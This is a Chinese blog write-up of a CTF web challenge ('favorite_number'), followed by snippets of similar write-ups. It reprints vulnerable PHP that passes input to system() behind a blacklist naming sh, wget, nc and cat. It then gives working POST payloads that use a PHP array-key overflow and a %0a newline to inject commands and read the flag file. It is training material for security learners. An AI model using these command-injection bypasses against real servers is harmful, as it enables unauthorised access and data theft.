攻防世界: web favorite-number

最新推荐文章于 2022-06-21 17:40:09 发布
最新推荐文章于 2022-06-21 17:40:09 发布
阅读量162 收藏
点赞数
文章标签: 字符串 php laravel shell thinkphp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793603
版权
目录

题目剖析

这是一道PHP代码审计题目

<?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
}

通过代码审计,可以观察到以下信息:

  • PHP版本5.5.9
  • 存在数组强类型比较
  • 存在过滤num的POST注入
    • ^和$ 匹配字符串开头和结尾
    • /d 匹配数字
    • /i 表示匹配的时候不区分大小写
    • /m 表示多行匹配。所以我们可以得出,在进行POST注入num的时候,需要首位一定是数字,并且要绕过多行匹配
  • 黑名单机制

漏洞分析

  • PHP版本5.5存在数组溢出漏洞
    即如果是32位的操作处理,那么数组最大值是232-1=4294967295=1111 1111 1111 1111 1111 1111 1111 1111。如果加1,那么就会变成1 0000 0000 0000 0000 0000 0000 0000 0000,因为是32位,只保留后32位,前面的1将被舍弃,数组重新归零。
    所以按照此题目的 stuff[4294967295]=stuff[0]
    那么就可以重新进行post注入,按照这个强类型比较又要求$stuff[0] != 'admin'
    可以书写payload:stuff[4294967296]=admin&stuff[1]=user
    这样可以绕过第一个if判断
  • num的换行匹配漏洞
    普通换行无法达成命令的注入,可以用%0a进行替代
  • 黑名单机制漏洞
    使用黑名单最大的坏处就是黑名单不全
    可以使用tac实现和cat效果完全相反的反向读取
    可以使用iNode节点读取flag文件

注入payload

所以我们可以分别注入payload为:
stuff[4294967296]=admin&stuff[1]=user&num=123%0als
!image
stuff[4294967296]=admin&stuff[1]=user&num=123%0als -i /image
stuff[4294967296]=admin&stuff[1]=user&num=123%0atac find / -inum 33043719image

Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
攻防世界WEB练习-favorite_number
墨鱼菜鸡
09-10 148
目录 题目场景 代码审计及绕过 通过php5.5版本的数组key溢出漏洞进行数组绕过 换行符绕过正则跨行匹配 黑名单绕过 题目场景 <?php //php5.5.9 $stuff=$_POST["stuff"]; $array=['admin','user']; if($stuff===$array&&amp...
攻防世界Webfavorite_number
Light_inthe_eyes的博客
10-16 154
打开页面,发现一串代码,代码审计: <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc|python
日常练习之web攻防世界favorite_number
doraemon12345的博客
12-01 250
打开题目php代码映入眼帘,看到有提示版本,应该是版本漏洞 是个判断数组强等于,又要首元素不等,然后正则要求整个字符串都是数字 搜寻php5.5.9版本漏洞,有关php数组key溢出,看了大佬们的解释,有点明白,又有点不明白先放payload stuff[4294967296]=admin&stuff[1]=user&num=123 按照询问大佬的解释和网上查阅的资料,我的理解是计算机操作系统是32位的,那它最多的就是[2^31],这里的[4294967296=2 ^32 ]所以就会存在
攻防世界 favorite_number web题 详解
xmj818719的博客
03-31 3860
首先进入页面 进入代码审计 首先数组强等于 又要满足第一个元素不等 其次正则,首先^\d+& 要求num完全为数字 i : ignore 执行大小写不敏感的匹配 m:multiple 多行模式 跨行检测 最后是常用命令的黑名单 首先准备第一个绕过 给了PHP版本5.5.9 存在key整数溢出漏洞当key=4294967296(2^32)可绕过检测 第一个条件的payload : stuff[4294967296]=admin&stuff[1]=user&a...
攻防世界 web高手进阶区 favorite_number
sinat_31884905的博客
03-07 285
打开后发现是一道php代码审计题 1.首先是个判断,既要数组强等,又要首元素不为admin (PHP5.59的漏洞) 2.做了一个正则匹配,要求字符串全为数字,大小写不敏感,跨行检测 (匹配数字注意到了,如何绕过呢,跨行)) 3.写了一个黑名单,把常用的都排除了 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、php5.5.9这个版本
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界Let-god-knows杂项
最新发布
11-20
攻防世界Let_god_knows杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947532
攻防世界hit-the-core,杂项misc
11-01
攻防世界hit-the-core,杂项misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127626829
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界 Web高手进阶区 favorite_number
feng的博客
12-21 869
知识点 PHP的数组key溢出。 PHP的preg_match的/m绕过。 命令执行绕过。 WP 昨天偶然翻自己的收藏夹,突然翻到了攻防世界,差点忘了攻防世界web还没刷完。。就回来稍微看了个题目,还是挺有意思的,不过我也没能完全独立做出来,前两个点都遇到了问题,反而是最后的命令执行做的比较轻松。 首先进入环境,审一下代码: <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $
攻防世界web高手进阶WP-favorite number
Whaocai的博客
08-01 477
攻防世界web高手进阶WP-favorite number 考点: ①php5.5 key数组溢出 ②%0A绕过preg_match() 打开链接是一道php源码审计问题 解题步骤: ①stuff === $array && $stuff[0] != 'admin’ ②num必须是数字 ③黑名单,禁止了敏感字符* ^ }{ \等和一些敏感函数 第一步让stuff与数组强相等,并且stuff数组的第一个元素与stuff数组的第一个元素与stuff数组的第一个元素与array数组的第一个元素不相
从一道题看数组的key溢出问题
qq_45951598的博客
12-05 1214
<?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { //个判断,既要数组强等于,又要首元素不等 $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ // i不区分大小写 // m使边.
攻防世界web高手进阶篇刷题小计记
q1415500189的博客
01-22 2439
攻防世界刷题小记
xctf攻防世界 Web高手进阶区 favorite_number
l8947943的博客
12-29 927
作为一个新手,一路走来,人都麻了,就当积累知识点了! 1. 进入到题目场景,看到代码,因此想到代码审计 2.尝试分析代码 <?php //php5.5.9 $stuff = $_POST["stuff"]; // 接收POST传过的参数,key为"stuff" $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { // stuff的参数要与array恒等,且stuff数组第一个参数不能
攻防世界-favorite_number-(详细操作)做题笔记
qq_43715020的博客
06-21 1050
攻防世界-favorite_number-(详细操作)做题笔记
攻防世界-favorite number
xixihahawuwu的博客
11-23 1596
一道web题 题目并没有给我们有用的提示信息 进入环境 这个应该是网页的源码 开始代码审计 我们可以很明显的看到一个麻烦的东西 if($stuff === $array && $stuff[0] != ‘admin’) { 这里即要求一个强等于,还要求首元素要不一样 然后是一个正则,还有一个黑名单 第一个应该要从php5.5.9自身的漏洞入手,去查查资料 问题出在php中key数组的溢出 https://segmentfault.com/q/1010000003871264 这个链接是
攻防世界-favorite_number
m0_47571887的博客
11-19 2822
打开题目,看到一些php的代码,我们来审计一下 第一个if ($stuff===$array&&$stuff[0]!='admin') //强等于,并且首元素不等于admin (preg_match("/^\d+$/im",$num) //必须是纯数字,并且前面的/是开启了多行匹配,加上^和$,匹配开头和结尾,合起来就是匹配每行的开头和结尾 (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*...
[攻防世界]favorite_number
snowlyzz的博客
05-07 351
<?php // php5.5.9 // 传参方式是post $stuff = $_POST["stuff"]; // 白名单 $array = ['admin', 'user']; // 既要数组强等于,又要首元素元素不等于 // 即要$stuff === ['admin', 'user'] 又要 $stuff[0]!='admin' if($stuff === $array && $stuff[0] != 'admin') { // 取得另一个post参数 $.
MySQL注入攻防指南:SQLi-Labs实战解析
"《Mysql注入---sqlilabs---lcamry MYSQL注入天书》是作者Lcamry创作的一份关于SQL注入的学习手册,主要针对SQLi-labs平台的挑战进行详细解析,涵盖了基础到高级的MySQL注入技术,包括盲注、导入导出操作、增删改...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值